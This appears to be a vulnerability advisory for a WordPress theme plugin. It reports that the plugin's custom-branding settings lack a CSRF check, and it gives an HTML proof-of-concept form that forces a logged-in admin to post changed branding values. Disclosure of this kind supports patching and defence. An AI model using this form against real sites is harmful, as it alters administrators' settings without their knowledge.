The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=be_custom_branding" method="POST">
<input type="hidden" name="betheme_label" value="" />
<input type="hidden" name="betheme_url_slug" value="" />
<input type="hidden" name="replaced_logo_url" value="" />
<input type="hidden" name="replaced_theme_image" value="" />
<input type="hidden" name="replaced_theme_desc" value="" />
<input type="hidden" name="replaced_theme_author" value="Muffin Group 1337" />
<input type="hidden" name="submit" value="Save changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>